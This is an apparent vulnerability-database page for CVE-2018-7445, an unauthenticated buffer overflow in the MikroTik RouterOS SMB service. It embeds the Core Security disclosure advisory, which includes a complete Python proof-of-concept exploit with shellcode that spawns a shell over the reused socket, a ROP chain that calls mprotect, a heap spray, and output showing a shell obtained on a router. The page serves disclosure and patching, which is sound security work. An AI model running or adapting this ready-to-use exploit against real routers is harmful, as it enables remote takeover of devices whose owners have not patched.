Vulnerabilities > CVE-2018-7445 - Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Mikrotik Routeros
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
HIGH Summary
A buffer overflow was found in the MikroTik RouterOS SMB service when processing NetBIOS session request messages. Remote attackers with access to the service can exploit this vulnerability and gain code execution on the system. The overflow occurs before authentication takes place, so it is possible for an unauthenticated remote attacker to exploit it. All architectures and all devices running RouterOS before versions 6.41.3/6.42rc27 are vulnerable.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Buffer Overflow via Environment Variables This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.
- Overflow Buffers Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an attacker. As a consequence, an attacker is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the attackers' choice.
- Client-side Injection-induced Buffer Overflow This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service.
- Filter Failure through Buffer Overflow In this attack, the idea is to cause an active filter to fail by causing an oversized transaction. An attacker may try to feed overly long input strings to the program in an attempt to overwhelm the filter (by causing a buffer overflow) and hoping that the filter does not fail securely (i.e. the user input is let into the system unfiltered).
- MIME Conversion An attacker exploits a weakness in the MIME conversion routine to cause a buffer overflow and gain control over the mail server machine. The MIME system is designed to allow various different information formats to be interpreted and sent via e-mail. Attack points exist when data are converted to MIME compatible format and back.
Exploit-Db
description | MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow. CVE-2018-7445. Remote exploit for Hardware platform |
file | exploits/hardware/remote/44290.py |
id | EDB-ID:44290 |
last seen | 2018-05-24 |
modified | 2018-03-15 |
platform | hardware |
port | |
published | 2018-03-15 |
reporter | Exploit-DB |
source | https://www.exploit-db.com/download/44290/ |
title | MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow |
type | remote |
Nessus
NASL family | Misc. |
NASL id | MIKROTIK_6_41_3.NASL |
description | According to its self-reported version, the remote networking device is running a version of MikroTik RouterOS prior to 6.40.7 or 6.41.x prior to 6.41.3. It is, therefore, affected by a remote SMB buffer overflow vulnerability that can be leveraged by an unauthenticated, remote attacker to execute arbitrary code. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 108521 |
published | 2018-03-22 |
reporter | This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/108521 |
title | MikroTik RouterOS < 6.40.7 or 6.41.x < 6.41.3 SMB Buffer Overflow |
code |
|
Packetstorm
data source | https://packetstormsecurity.com/files/download/146795/CORE-2018-0003.txt |
id | PACKETSTORM:146795 |
last seen | 2018-03-23 |
published | 2018-03-15 |
reporter | Core Security Technologies |
source | https://packetstormsecurity.com/files/146795/MikroTik-RouterOS-SMB-Buffer-Overflow.html |
title | MikroTik RouterOS SMB Buffer Overflow |
Saint
bid | 103427 |
description | MicroTik RouterOS SMB buffer overflow |
title | microtik_routeros_smb_bo |
type | remote |
Seebug
bulletinFamily | exploit |
description | ### 1. Advisory Information * Title: MikroTik RouterOS SMB Buffer Overflow * Advisory ID: CORE-2018-0003 * Advisory URL: http://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow * Date published: 2018-03-15 * Date of last update: 2018-03-15 * Vendors contacted: MikroTik * Release mode: Coordinated release ### 2. Vulnerability Information * Class: Stack-based Buffer Overflow [CWE-121] * Impact: Code execution * Remotely Exploitable: Yes * Locally Exploitable: No * CVE Name: CVE-2018-7445 ### 3. Vulnerability Description MikroTik is a Latvian company which was founded in 1996 to develop routers and wireless ISP systems. MikroTik now provides hardware and software for Internet connectivity in most of the countries around the world. RouterOS is MikroTik's stand-alone operating system based on Linux v3.3.5 kernel. A buffer overflow was found in the MikroTik RouterOS SMB service when processing NetBIOS session request messages. Remote attackers with access to the service can exploit this vulnerability and gain code execution on the system. The overflow occurs before authentication takes place, so it is possible for an unauthenticated remote attacker to exploit it. ### 4. Vulnerable Packages All architectures and all devices running RouterOS before versions 6.41.3/6.42rc27 ### 5. Vendor Information, Solutions and Workarounds MikroTik released version 6.41.3 of RouterOS [1] that fixes the reported issue. The workaround suggested by MikroTik in case it is not possible to install an update consists of disabling the SMB service. ### 6. Credits This vulnerability was discovered and researched by Juan Caillava and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team. ### 7. Technical Description / Proof of Concept Code The overflow takes place in the function in charge of parsing NetBIOS names, which receives two stack allocated buffers as parameters. As an example reference, this function is located at address 0x08054607 on the x86 SMB binary version 6.40.5. The first byte of the source buffer is read and used as the size for the copy operation. The function then copies that amount of bytes into the destination buffer. Once that is done, the next byte of the source buffer is read and used as the new size. This loop finishes when the size to copy is equal to zero. No validation is done to ensure that the data fits on the destination buffer, resulting in a stack overflow. Simplified pseudo-code of the vulnerable function: ``` int parse_names(char *dst, char *src) { int len; int i; int offset; // take the length of the first string len = *src; offset = 0; while (len) { // copy the bytes of the string into the destination buffer for (i = offset; (i - offset) < len; ++i) { dst[i] = src[i+1]; } // take the length of the next string len = src[i+1]; // if it exists, then add a separator if (len) { dst[i] = "."; } // start over with the next string offset = i + 1; } // nul-terminate the string dst[offset] = 0; return offset; } ``` It is possible to reach this function by sending a NetBIOS session request message. We will demonstrate code execution targeting the x86 Cloud Hosted Router and develop a proof of concept exploit. How to approach the exploitation depends on the specifics of the targeted device and architecture. In the case of Cloud Hosted Router on x86, we will have to deal with DEP and ASLR. In order to bypass DEP, we will build a ROP chain to call 'mprotect' and mark a memory region as both writable and executable. In terms of ASLR, we found that even though the base address of the stack and the loaded libraries was randomized, the base address of the heap was not. Therefore, it is possible to store a large payload on the heap to act as a NOP sled right before triggering the vulnerable function and jump to a fixed location in this region. Our testing showed this approach to be extremely reliable. The proof of concept exploit presented below illustrates this process, reusing the connection socket to spawn a shell and execute arbitrary commands on the system. ``` #!/usr/bin/env python import socket import struct import sys import telnetlib NETBIOS_SESSION_MESSAGE = "\x00" NETBIOS_SESSION_REQUEST = "\x81" NETBIOS_SESSION_FLAGS = "\x00" # trick from <a href="http://shell-storm.org/shellcode/files/shellcode-881.php">http://shell-storm.org/shellcode/files/shellcode-881.php</a> # will place the socket file descriptor in eax find_sock_fd = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48" # dup stdin-stdout-stderr so we can reuse the existing connection dup_fds = "\x89\xc3\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9" # execve - cannot pass the 2nd arg as NULL or busybox will complain execve_bin_sh = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" # build shellcode shellcode = find_sock_fd + dup_fds + execve_bin_sh # rop to mprotect and make the heap executable # the heap base is not being subject to ASLR for whatever reason, so let's take advantage of it p = lambda x : struct.pack('I', x) rop = "" rop += p(0x0804c39d) # 0x0804c39d: pop ebx; pop ebp; ret; rop += p(0x08072000) # ebx -> heap base rop += p(0xffffffff) # ebp -> gibberish rop += p(0x080664f5) # 0x080664f5: pop ecx; adc al, 0xf7; ret; rop += p(0x14000) # ecx -> size for mprotect rop += p(0x08066f24) # 0x08066f24: pop edx; pop edi; pop ebp; ret; rop += p(0x00000007) # edx -> permissions for mprotect -> PROT_READ | PROT_WRITE | PROT_EXEC rop += p(0xffffffff) # edi -> gibberish rop += p(0xffffffff) # ebp -> gibberish rop += p(0x0804e30f) # 0x0804e30f: pop ebp; ret; rop += p(0x0000007d) # ebp -> mprotect system call rop += p(0x0804f94a) # 0x0804f94a: xchg eax, ebp; ret; rop += p(0xffffe42e) # 0xffffe42e; int 0x80; pop ebp; pop edx; pop ecx; ret - from vdso - not affected by ASLR rop += p(0xffffffff) # ebp -> gibberish rop += p(0x0) # edx -> zeroed out rop += p(0x0) # ecx -> zeroed out rop += p(0x0804e30f) # 0x0804e30f: pop ebp; ret; rop += p(0x08075802) # ebp -> somewhere on the heap that will (always?) contain user controlled data rop += p(0x0804f94a) # 0x0804f94a: xchg eax, ebp; ret; rop += p(0x0804e153) # jmp eax; - jump to our shellcode on the heap offset_to_regs = 83 # we do not really care about the initial register values other than overwriting the saved ret address ebx = p(0x45454545) esi = p(0x45454545) edi = p(0x45454545) ebp = p(0x45454545) eip = p(0x0804886c) # 0x0804886c: ret; payload = "\xff" * offset_to_regs + ebx + esi + edi + ebp + eip + rop header = struct.pack("!ccH", NETBIOS_SESSION_REQUEST, NETBIOS_SESSION_FLAGS, len(payload)) buf = header + payload def open_connection(ip): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, 139)) return s def store_payload(s): print "[+] storing payload on the heap" s.send((NETBIOS_SESSION_MESSAGE + "\x00\xeb\x02") * 4000 + "\x90" * 16 + shellcode) def crash_smb(s): print "[+] getting code execution" s.send(buf) if __name__ == "__main__": if len(sys.argv) != 2: print "%s ip" % sys.argv[0] sys.exit(1) s = open_connection(sys.argv[1]) store_payload(s) # the server closes the first connection, so we need to open another one t = telnetlib.Telnet() t.sock = open_connection(sys.argv[1]) crash_smb(t.sock) print "[+] got shell?" t.interact() ``` The following excerpt shows the successful exploitation of a remote SMB service. ``` [admin@ MikroTik] > ip smb print enabled: yes domain: MSHOME comment: MikrotikSMB allow-guests: yes interfaces: all [admin@ MikroTik] > ip address print Flags: X - disabled, I - invalid, D - dynamic # ADDRESS NETWORK INTERFACE 0 D 192.168.0.249/24 192.168.0.0 ether1 ``` ``` $ python smb_exploit.py 192.168.0.249 [+] storing payload on the heap [+] getting code execution [+] got shell? sh: turning off NDELAY mode uname -a Linux MikroTik 3.3.5-64 #1 SMP Tue Oct 31 12:39:30 UTC 2017 x86_64 unknown ``` ### 8. Report Timeline * 2018-02-19: Core Security sent an initial notification to MikroTik. * 2018-02-19: Core Security noticed that a candidate release addresses the vulnerability. * 2018-02-21: MikroTik answered saying that they were planning to release a final version with a fix for SMB the week of 26 February and asked for additional information. * 2018-02-21: Core Security thanked MikroTik's answer and sent a draft advisory with a technical description. In addition, Core Security proposed the release date to be March 1st. * 2018-02-21: MikroTik confirmed the proposed release date. * 2018-02-23: Core Security asked MikroTik for a confirmation about the availability of the fix before the publication date. Also, Core Security sent the CVE-ID request to Mitre. * 2018-02-23: MikroTik confirmed the availability of the fix for the publication date. * 2018-02-28: Core Security asked MikroTik for a confirmation about the release of the fixed version again. * 2018-02-28: MikroTik answered saying that they had some issues and asked for an extension of one week. * 2018-02-28: Core Security analyzed the possibility of postponing the publication date and asked MikroTik for a new release date. * 2018-03-01: MikroTik answered that they didn´t have a certain release date for their fix. * 2018-03-01: Core Security requested a solidified release date for coordinated disclosure. Agreed to postpone till March 8th. * 2018-03-01: MikroTik answered saying they understand it's their fault and if they don't release the fixed version in time, we might have to release our document. * 2018-03-02: Core Security thanked the update and asked again about the planned release date. * 2018-03-05: MikroTik answered that they still don't have a certain release date for their fix. * 2018-03-05: Core Security answered saying the one week postponed was proposed by Mikrotik, yet they still cannot commit to a release date. Core Security clarified again the intention is to do a coordinated release, but in order to do that it is needed a tentative release date. * 2018-03-12: Core Security noticed that a new version of MikroTik RouterOS were available and asked MikroTik if this version fixed the vulnerability. * 2018-03-12: MikroTik confirmed that the published version addressed the reported vulnerability. * 2018-03-15: Advisory CORE-2018-0003 published. |
id | SSV:97182 |
last seen | 2018-03-19 |
modified | 2018-03-16 |
published | 2018-03-16 |
reporter | Root |
source | https://www.seebug.org/vuldb/ssvid-97182 |
title | MikroTik RouterOS SMB Buffer Overflow(CVE-2018-7445) |
References
- http://seclists.org/fulldisclosure/2018/Mar/38
- http://seclists.org/fulldisclosure/2018/Mar/38
- http://www.securityfocus.com/bid/103427
- http://www.securityfocus.com/bid/103427
- https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
- https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
- https://www.exploit-db.com/exploits/44290/
- https://www.exploit-db.com/exploits/44290/